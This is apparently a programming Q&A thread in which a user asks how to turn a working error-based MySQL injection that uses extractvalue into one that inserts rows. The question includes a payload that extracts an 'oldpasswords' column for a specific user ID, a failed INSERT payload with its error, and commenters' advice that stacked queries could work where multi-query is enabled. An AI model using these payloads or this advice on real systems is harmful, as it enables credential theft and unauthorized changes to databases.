# INSERT Statement in XPATH SQL Injection

Tags: mysql, sql-insert, sql-injection

I was trying to hack my database and used a method known as error based SQL Injection using extractvalue functions.

I was successful in getting the database tables and columns using the below payload:

```
crmnotes WHERE id=1 AND extractvalue(0x0a,concat(0x0a,(select concat(oldpasswords) from ofform6_mniterp.entity WHERE userid=0x6d6e69746a6373313534 limit 0,1))) #
```

Now, I'm unable to use INSERT statement in place of SELECT to insert some data in database using this exploit.
I tried to make many INSERT payloads but each time getting syntax error.

One of the INSERT payload I have used:

```
crmnotes WHERE id=1 AND extractvalue(0x0a,concat(0x0a,(INSERT INTO ofform6_mniterp.entity(userid) VALUES(0x6d6e69746a6130303031))))
```

Error Received:

> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'INTO ofform6_mniterp.entity(userid) VALUES(0x6d6e69746a6130303031))))

Comment: **How** are you "injecting" SQL, exactly? I don't see how a correctly parameterized query would be vulnerable to injection; please explain how you're using `EXTRACTVALUE` to exploit some vulnerability?

Comment: @Dai this question is about exploiting a vulnerability, not about making a code vulnerable. Hence, it makes no use to mention parameterized queries.

Comment: Vinay, Yes, you cannot INSERT statement in place of SELECT to insert some data in database using extractvalue and nobody told you you can

Comment: @YourCommonSense Is there any other way in Error Based SQL Injection to use INSERT query?

Comment: You cannot put INSERT into a subquery in any way. You could inject an INSERT statement as a second query if your interface supports multi-query, but most interfaces do not support multi-query by default.